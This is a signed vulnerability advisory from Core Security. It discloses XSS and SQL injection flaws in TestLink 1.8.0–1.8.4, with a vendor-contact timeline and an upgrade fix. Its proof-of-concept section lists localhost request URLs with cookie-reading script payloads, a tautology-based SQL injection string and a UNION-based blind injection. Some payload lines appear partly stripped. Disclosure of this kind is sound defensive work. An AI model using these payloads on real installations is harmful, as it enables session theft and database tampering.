-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
                                Core Security Technologies - CoreLabs
Advisory
                                        
http://www.coresecurity.com/corelabs/ 

Multiple XSS and Injection Vulnerabilities in TestLink Test Management
and Execution System


1. *Advisory Information*

Title: Multiple XSS and Injection Vulnerabilities in TestLink Test
Management and Execution System
Advisory Id: CORE-2009-1013
Advisory URL:
http://www.coresecurity.com/content/testlink-multiple-injection-vulnerabilities 
Date published: 2009-12-09
Date of last update: 2009-12-09
Vendors contacted: TestLink Community
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Cross site scripting [CWE-79], SQL injection [CWE-89]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 37258
CVE Name: CVE-2009-4237, CVE-2009-4238


3. *Vulnerability Description*

 Multiple injection (both XSS [1] and SQL) vulnerabilities have been
discovered in Testlink [2], a widely used test-case management
application written in PHP [3]. One of the XSS vulnerabilities,
discovered in its login screen, can be exploited without an
authenticated session.


4. *Vulnerable packages*

   . TestLink 1.8.0
   . TestLink 1.8.1
   . TestLink 1.8.2
   . TestLink 1.8.3
   . TestLink 1.8.4
   . Older versions are probably affected too, but they were not checked.


5. *Non-vulnerable packages*

   . TestLink 1.8.5


6. *Solutions and Workarounds*

 Upgrade to a non-vulnerable version, such as 1.8.5. TestLink features
the option to upgrade a current installation in its install scripts.


7. *Credits*

 These vulnerabilities were discovered and researched by Pablo
Annetta, from Core Security Technologies, during Core Bugweek 2009 as
a member of the "Los Herederos de Don Pablo (HDP)" team.


8. *Technical Description / Proof of Concept Code*

 Most of these vulnerabilities are present in the Testlink code
because the logic for the sanitization of user input is rudimentary.
Each script sanitizes its own input, instead of abstracting this task
to another layer of logic. Often only slashes are stripped, but html
entities are almost never escaped.

 The only vulnerability in this report that can be exploited without
an authenticated session is a XSS vulnerability in Testlink's login
page 'login.php'. This script gets a parameter named 'req', which is
used by the application to set the next request to be made. All
parameters are initialized in the 'init_args' function which doesn't
sanitize its arguments appropriately as seen below.

/-----
function init_args()
{
    $args = new stdClass();
    $_REQUEST = strings_stripSlashes($_REQUEST);
    
    $args->note = isset($_REQUEST['note']) ? $_REQUEST['note'] : null;
    $args->login = isset($_REQUEST['tl_login']) ?
trim($_REQUEST['tl_login']) : null;
    $args->pwd = isset($_REQUEST['tl_password']) ?
$_REQUEST['tl_password'] : null;

    $args->reqURI = isset($_REQUEST['req']) ? $_REQUEST['req'] : null;
    $args->preqURI = (isset($_REQUEST['reqURI']) &&
strlen($_REQUEST['reqURI'])) ? $_REQUEST['reqURI'] : null;
 
    return $args;
}
- -----/

 This vulnerability can be verified by issuing the following request
to a Testlink installation on localhost:

/-----
http://127.0.0.1/testlink/login.php?req="> src 
="http://www.coresecurity.com/content/xxxx" width="100%" 
height="300">
- -----/


 Other XSS vulnerabilities on different scripts can be exploited with
an authenticated session. Proof of concept code follows:

/-----
 

http://127.0.0.1/testlink/lib/attachments/attachmentupload.php?id=1&tableName=' 
alert(document.cookie)http://127.0.0.1/testlink/lib/events/eventviewer.php?startDate=" 
alert(document.cookie)http://127.0.0.1/testlink/lib/events/eventviewer.php?endDate=" 
alert(document.cookie)http://127.0.0.1/testlink/lib/events/eventviewer.php?logLevel=" 
- -----/


 There are more XSS attacks that can be executed with *an
authenticated session* on installations that have *at least one test
plan created*. Most of these are due to an 'echo' statement in
TestLink's database functions that directly outputs SQL errors back to
the browser without escaping html entities. This can be found on line
181 of 'testlink/lib/functions/database.class.php', where some
function such as 'htmlspecialchars' should be called on '
$this->error($p_query)' and '$message'. A templating engine (TestLink
uses Smarty for many other tasks) could also be used to output these
errors.

/-----
if ( !$t_result ) {
    echo "ERROR ON exec_query() - database.class.php 
" .
$this->error($p_query) . "
";
  echo "
 THE MESSAGE :: $message. "
";
    return false;
} else {
    return $t_result;
}
- -----/

 This proof of concept code triggers the vulnerabilities described above:

/-----
http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary='&expected_results=' 
http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary='&name= 
http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary='&steps= 
http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary=' 
- -----/

 More XSS vulnerabilities can also be triggered because of the problem
described above, but also because another independent XSS exists on
'resultsMoreBuilds_buildReport.php' caused by not escaping the
'search_notes_string', by issuing this request (also when logged into
an installation with a Test Plan created):

/-----
http://127.0.0.1/testlink/lib/results/resultsMoreBuilds_buildReport.php?report_type=0&display_query_params=1&search_notes_string= 
- -----/


 With an authenticated session, the following SQL injection bug can
also be exploited.

In 'http://127.0.0.1/testlink/lib/general/navBar.php', filling in the 
'Test Case ID' field with 'TC-1 or 1 = 1 update tcversions set summary
= ''' results in
reflected HTML.

 Also with an authenticated session the following blind SQL injection
exists

/-----
http://127.0.0.1/testlink/lib/events/eventviewer.php?logLevel=1,1)%20union%20SELECT%20id%20FROM%20testplans%20%23 
- -----/


9. *Report Timeline*

. 2009-10-29:
Core Security Technologies notifies Toshiyuki Kawanishi (at his
@users.sourceforge.jp address) from the Teamst team of the 
vulnerabilities, offering a draft for this advisory in plaintext or
encrypted form (if proper keys are sent). November 9th, 2009, is
proposed as a release date.

. 2009-11-02:
Because no response was obtained from Toshiyuki at his
@users.sourceforge.jp, Core Security Technologies tries to contact him 
using the "Contact" webform in http://www.teamst.org. 

. 2009-11-09:
Since there is still no reply from Toshiyuki, Core now tries
contacting Francisco Mancardi. November 23rd is now proposed as a
release date.

. 2009-11-09:
Francisco Mancardi replies asking that a copy in plaintext of the
advisory be sent to him, and also to Toshiyuki Kawanishi and Martin
Havlat.

. 2009-11-09:
Core sends a draft for this advisory, including the technical
description of the vulnerabilities, to Francisco Mancardi, Toshiyuki
Kawanishi and Martin Havlat.

. 2009-11-10:
Martin Havlat replies acknowledging reception of the advisory draft,
and tells Core that internal issue #2947 has been created in their bug
tracking system to fix these bugs. He mentions these issues shall be
fixed on release 1.8.5 of TestLink.

. 2009-11-12:
Core replies asking for more information regarding the release date of
TestLink 1.8.5. An account is created by Core in TestLink's internal
bug tracking system to access information about issue #2947.

. 2009-11-17:
Core requests again information regarding the release date of TestLink
1.8.5 in order to schedule the release of this advisory accordingly,
since no reply on this has been yet given by the TestLink developers
contacted. Core also mentions that issue #2947 cannot be accessed by
the user created in order to follow the development of a patch for the
vulnerabilities reported here.

. 2009-11-17:
Francisco Mancardi replies specifying that "maybe [issue #2947] has
private status".

. 2009-11-20:
Core asks once more for a release date for a fixed version of
TestLink. The advisory is rescheduled for release on Monday 30th,
November, since there is no information regarding the possibility of
meeting the deadline of Monday 23rd by the TestLink team. Core also
mentions that they are eager to passively monitor the progress of the
TestLink developers in fixing these issues if access is given to issue
#2947 to their created account on TestLink's bug tracking system.

. 2009-11-26:
Since there was no reply to their last e-mail, Core resends it,
reminding the developers that their planned release date for the
advisory is Monday 30th, and that they would like to know if there is
a planned release date for a fixed version of TestLink. Core reminds
the developers about their commitment in helping them in correctly
fixing the bug, should they get access to private issue #2947.

. 2009-11-27:
Martin Havlat replies that due to priorities in the internal
development group of Testlink the bug has not yet been fixed. He
commits to release TestLink 1.8.5 as soon as this bug is fixed, but
besides stating that he wished to have time to fix this himself, no
firm or verifiable claim is made that can assure Core of a planned fix
and release.

. 2009-11-27:
Core reschedules its internal publication date for this advisory to
December 14th. This will be the final date and a user-release will be
made, unless TestLink developers share information that can be
verified by Core that shows commitment to eventually looking into said
bugs and fixing them. Core suggests that developers actually in charge
of these issues are copied in the e-mail loop, or that access to
internal issue-tracking tools be given to them to actively participate
in the discussions and the patching process.

. 2009-11-30:
Martin Havlat asks for technical details needed by him to confirm some
of these vulnerabilities.

. 2009-12-01:
Core replies with the technical details needed by Martin Havlat.

. 2009-12-02:
Martin Havlat sends a patched version of TestLink to Core asking for
verification of fixes to some of the vulnerabilities reported in this
advisory.

. 2009-12-03:
Core replies saying that the fixes proposed by Martin Havlat fail to
patch those specific vulnerabilities. The bugs are further researched
by Core and the advisory draft is modified to include a more detailed
explanation of these bugs. This technical information is shared by
Core with Martin Havlat and some insight into possible fixes is also
given.

. 2009-12-09:
TestLink 1.8.5 is released.

. 2009-12-09:
Advisory CORE-2009-1013 is published.


10. *References*

[1] http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) 
[2] http://www.teamst.org/ 
[3] http://www.owasp.org/index.php/PHP_Top_5 


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is
charged with anticipating the future needs and requirements for
information security technologies. We conduct our research in several
important areas of computer security including system vulnerabilities,
cyber attack planning and simulation, source code auditing, and
cryptography. Our results include problem formalization,
identification of vulnerabilities, novel solutions and prototypes for
new technologies. CoreLabs regularly publishes security advisories,
technical papers, project information and shared software tools for
public use at: http://www.coresecurity.com/corelabs. 


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources
are exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and
software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980
or on the Web at http://www.coresecurity.com. 


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc. 

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: GnuPT v3.6.3
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ 
 
iEYEARECAAYFAksgL9IACgkQyNibggitWa3csgCfdV5dyeDFf1r+/yNIO6PpDgvk
LJgAoKTesYDuoe6SpJzMhPKujbi1Z0vV
=H22d
-----END PGP SIGNATURE-----